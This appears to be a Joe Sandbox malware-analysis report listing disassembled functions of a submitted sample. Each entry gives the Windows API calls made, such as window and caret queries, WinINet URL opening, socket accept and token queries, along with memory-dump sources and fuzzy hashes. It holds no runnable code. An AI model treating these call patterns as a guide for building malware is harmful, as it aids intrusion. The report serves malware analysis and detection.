Part of subcall function 00A55F55: AttachThreadInput.USER32(00000000,?,00A5781F), ref: 00A55F7D

GetCaretPos.USER32(?), ref: 00A77CCA
ClientToScreen.USER32(00000000,?), ref: 00A77D03
GetForegroundWindow.USER32 ref: 00A77D09

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 6caa6e80c08a75b0b658a3828bee48cc519a05aeaa540321459cf1b79a21ea9f
Instruction ID: 64321dde8d52201569b8f4aa8264792ba4d940d60e726923ce20af5e7379f892
Opcode Fuzzy Hash: 6caa6e80c08a75b0b658a3828bee48cc519a05aeaa540321459cf1b79a21ea9f
Instruction Fuzzy Hash: 4831FF72D00118AFDB10EFB9DD859EFBBF9EF58314B10846AE815E7211DA319E458BA0

Function 00A7F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

GetCursorPos.USER32(?), ref: 00A7F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A8E4C0,?,?,?,?,?), ref: 00A7F226
GetCursorPos.USER32(?), ref: 00A7F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A8E4C0,?,?,?), ref: 00A7F2A6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 615e791f308c82016c28001bb0a910ed4428ccf5e1f673efe6e342e766ce8eab
Instruction ID: 9862ceef78a77f9be93799f83ccde40f453fb6168fecb679fc88b00d6f33151e
Opcode Fuzzy Hash: 615e791f308c82016c28001bb0a910ed4428ccf5e1f673efe6e342e766ce8eab
Instruction Fuzzy Hash: 67217E39601028AFCB15CF94DC58EEA7BB5EB09711F05C06AF90A5B2A2D7349E51DBA0

Function 00A6431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A64358

Part of subcall function 00A643E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A64401
Part of subcall function 00A643E2: InternetCloseHandle.WININET(00000000), ref: 00A6449E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: c96f5a46df2a8d5d87a42417950d07f07a77e13f0677ff2d123cfae9c0c716b5
Instruction ID: 3f1a744c09590d5853ae94cb9fdfb4b6e6f0dac2fc0f053a27e5e9245c1c7945
Opcode Fuzzy Hash: c96f5a46df2a8d5d87a42417950d07f07a77e13f0677ff2d123cfae9c0c716b5
Instruction Fuzzy Hash: E221C031604A05BFEB129FA0DD00FBBBBB9FF48710F10401AFA159B650DB71D861ABA0

Function 00A78A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00A78AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A78AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A78ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A78ADC

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 866fa276fedc1945f5741b5745aa9f629234919ab889be92cae5c48c3805d174
Instruction ID: be06f85c7acf7c1fbbd3d0f92419d0a26c4783b7d76776b0d188ba9441d3a56d
Opcode Fuzzy Hash: 866fa276fedc1945f5741b5745aa9f629234919ab889be92cae5c48c3805d174
Instruction Fuzzy Hash: 1B11BE31345120AFDB04AB18CD09FBA77A9AF85360F15811AF92AC72E1CF74AC418790

Function 00A68A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00A68AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00A68AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00A68AFF
WSAGetLastError.WSOCK32(00000000), ref: 00A68B16

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 069000b0fab6d092bf69c5d120edfd69020751f1e67063c72ed06730576066c1
Instruction ID: 6af687dc625728d64d0667013bdbe16985b6581a172e944c566e59d830353585
Opcode Fuzzy Hash: 069000b0fab6d092bf69c5d120edfd69020751f1e67063c72ed06730576066c1
Instruction Fuzzy Hash: D4216671A001249FC711DFA9D985A9E7BFCEF49350F00416AF849D7251DB7499858F90

Function 00A50AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A51E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A50ABB,?,?,?,00A5187A,00000000,000000EF,00000119,?,?), ref: 00A51E77
Part of subcall function 00A51E68: lstrcpyW.KERNEL32(00000000,?,?,00A50ABB,?,?,?,00A5187A,00000000,000000EF,00000119,?,?,00000000), ref: 00A51E9D
Part of subcall function 00A51E68: lstrcmpiW.KERNEL32(00000000,?,00A50ABB,?,?,?,00A5187A,00000000,000000EF,00000119,?,?), ref: 00A51ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A5187A,00000000,000000EF,00000119,?,?,00000000), ref: 00A50AD4
lstrcpyW.KERNEL32(00000000,?,?,00A5187A,00000000,000000EF,00000119,?,?,00000000), ref: 00A50AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,00A5187A,00000000,000000EF,00000119,?,?,00000000), ref: 00A50B2E

Strings

cdecl, xrefs: 00A50B25

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 50db16ade9fc2a1165c4cbebb626438aece86b71069824ffcf6bc861e48c7e5b
Instruction ID: f3550d8cef1304c08ec2e52d71483c61deaa494c8366a5f7dcf8c12a81a71d50
Opcode Fuzzy Hash: 50db16ade9fc2a1165c4cbebb626438aece86b71069824ffcf6bc861e48c7e5b
Instruction Fuzzy Hash: 9B11D036200305AFDB25AF64DC85E7A77B8FF45310B81412AFC06CB2A0EB719855C7A0

Function 00A42F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A42FB5

Part of subcall function 00A3395C: __FF_MSGBANNER.LIBCMT ref: 00A33973
Part of subcall function 00A3395C: __NMSG_WRITE.LIBCMT ref: 00A3397A
Part of subcall function 00A3395C: RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,00000001,00000000,?,?,00A2F507,?,0000000E), ref: 00A3399F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 48ed10f9e10618156d6b3359d17b7f645faf4266f4b6178c8d613d9531f3bdd2
Instruction ID: c1a0587135c54b884ff789c55f80ad69bcd9528bc36aa1a24a1a33186d027a18
Opcode Fuzzy Hash: 48ed10f9e10618156d6b3359d17b7f645faf4266f4b6178c8d613d9531f3bdd2
Instruction Fuzzy Hash: DE11C676509212ABDF317BB0BD4576E3BA4AFC4361F604926F84A9A151DF30CD509790

Function 00A2EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A2EBB2

Part of subcall function 00A151AF: _memset.LIBCMT ref: 00A1522F
Part of subcall function 00A151AF: _wcscpy.LIBCMT ref: 00A15283
Part of subcall function 00A151AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A15293

KillTimer.USER32(?,00000001,?,?), ref: 00A2EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A2EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A83C88

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 744241bbe6cad133e21cb0fe465ace10e2cbae3a01db4c6842e1bf035c7be017
Instruction ID: 2d953866914dbbe2c1dd81362f68a187e93fba9c2f7ad992819805601194611a
Opcode Fuzzy Hash: 744241bbe6cad133e21cb0fe465ace10e2cbae3a01db4c6842e1bf035c7be017
Instruction Fuzzy Hash: A4210A71504794AFEB32D768D855BE7BBFC9B01704F04045DE68A56141C7702AC58B51

Function 00A5058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A505AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A505C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A505DD
FreeLibrary.KERNEL32(?), ref: 00A50632

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 39c1f4b99e2bbacb2562002eff5f2d6fa4d116e6832ea07ee38b3862f1c3111d
Instruction ID: fbb18fdb9368378436c27b01bbcce322a391e883564f876733c87243bee35488
Opcode Fuzzy Hash: 39c1f4b99e2bbacb2562002eff5f2d6fa4d116e6832ea07ee38b3862f1c3111d
Instruction Fuzzy Hash: B7218175A00219EFDB20CF95DC88EDABBB8FF40701F00856AE91696450EBB0EA59DF50

Function 00A56713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00A56733
_memset.LIBCMT ref: 00A56754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00A567A6
CloseHandle.KERNEL32(00000000), ref: 00A567AF

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: decc22d493c2c7fe18cd8b79f9eebd5338c9810056f096f8a88d5d5efd58a9f8
Instruction ID: dc3ea2c2ed222fdc4c96b76b34eb6520e18f12f1ae73b8ec4de008f4c5636bc8
Opcode Fuzzy Hash: decc22d493c2c7fe18cd8b79f9eebd5338c9810056f096f8a88d5d5efd58a9f8
Instruction Fuzzy Hash: 4211CA769012287AE7209BA5AC4DFEBBBBCEF44764F10419AF904E71D0D7744E848B64

Function 00A4B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A4AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A4AA79
Part of subcall function 00A4AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A4AA83
Part of subcall function 00A4AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A4AA92
Part of subcall function 00A4AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A4AA99
Part of subcall function 00A4AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A4AAAF

GetLengthSid.ADVAPI32(?,00000000,00A4ADE4,?,?), ref: 00A4B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A4B227
HeapAlloc.KERNEL32(00000000), ref: 00A4B22E
CopySid.ADVAPI32(?,00000000,?), ref: 00A4B247

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: cb89620e9274b7e591bafdcdec853d291596f123f5b700e4b94077a886d75aa7
Instruction ID: 4e49c11acc5d6056f28656387cd8cc7e69af6b5e930f5821e8b32bf07dad8f2f
Opcode Fuzzy Hash: cb89620e9274b7e591bafdcdec853d291596f123f5b700e4b94077a886d75aa7
Instruction Fuzzy Hash: 7D118F79A10205AFDB04DF98DD85AAEB7B9EFC5308B14842EE94297210D771EE85CB20

Function 00A4B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00A4B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A4B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A4B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A4B4DB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bb3a96cfc0a9e73a31ba335d42221b8c6b67e6e24a639046f13ac90187d4695e
Instruction ID: 83ac832df766539186dd532db2578b8f66d18033ff925512929c2638df14b469
Opcode Fuzzy Hash: bb3a96cfc0a9e73a31ba335d42221b8c6b67e6e24a639046f13ac90187d4695e
Instruction Fuzzy Hash: 9A112A7A900218FFDB11DFA9C985E9DBBB4FB48710F204091E604B7295D771AE11DBA4

Function 00A2B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A2B5A5
GetClientRect.USER32(?,?), ref: 00A8E69A
GetCursorPos.USER32(?), ref: 00A8E6A4
ScreenToClient.USER32(?,?), ref: 00A8E6AF

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 5d2e9390a423ede6ca9c676826c74ccd529b664a8117a65bf4c21e1cdd412bf4
Instruction ID: 079f9216a193db2e49ec550914aedf4e45088ffcda335da69fe743ad5613b212
Opcode Fuzzy Hash: 5d2e9390a423ede6ca9c676826c74ccd529b664a8117a65bf4c21e1cdd412bf4
Instruction Fuzzy Hash: 85110631A10429FFCB10EF98DE859EE77B9EB09304F500466E902EB140D734AA92CBB1

Function 00A5732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A57352
MessageBoxW.USER32(?,?,?,?), ref: 00A57385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A5739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A573A2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: f6b18b7ffd3ea247f5930eb6b016fed7ff8cf6e88ee75150c36531306c1de434
Instruction ID: 2eb99535f92e0762d275e74793a4bec56ca95d598e1e37f70a375ec12849fe7a
Opcode Fuzzy Hash: f6b18b7ffd3ea247f5930eb6b016fed7ff8cf6e88ee75150c36531306c1de434
Instruction Fuzzy Hash: 2511A572A04214BBCB01DBACEC05ADE7BA9AB55321F144356FD25E3251D67089059BA1

Function 00A2D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A2D1BA
GetStockObject.GDI32(00000011), ref: 00A2D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A2D1D8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 02a2b4f02b05ab001cff28380d7a7623e2934fc6cc324e508778534e95602fcd
Instruction ID: a4c2e1b26b10fb73174828e2dc5f7fceccf9500ba159a1ec55ddb69b37813868
Opcode Fuzzy Hash: 02a2b4f02b05ab001cff28380d7a7623e2934fc6cc324e508778534e95602fcd
Instruction Fuzzy Hash: 8F11C072201619BFEF028FD4EC54EEABB6AFF08364F044226FA0552050CB31DCA1DBA0

Function 00A44DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00A44E16

Part of subcall function 00A454F5: __fltout2.LIBCMT ref: 00A4551E

__cftog_l.LIBCMT ref: 00A44E3C
__cftoe_l.LIBCMT ref: 00A44E6E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 6eeeb7c1ecb05ef56155e02105655b996825cddd00aef0edd1d24fb18f1e70aa
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 7201483A40014ABBCF125F94DD129EE3F63BB9C350B588455FA2859031D736DAB2AB81

Function 00A37452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A37A0D: __getptd_noexit.LIBCMT ref: 00A37A0E

__lock.LIBCMT ref: 00A3748F
InterlockedDecrement.KERNEL32(?), ref: 00A374AC
_free.LIBCMT ref: 00A374BF
InterlockedIncrement.KERNEL32(00C56488), ref: 00A374D7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
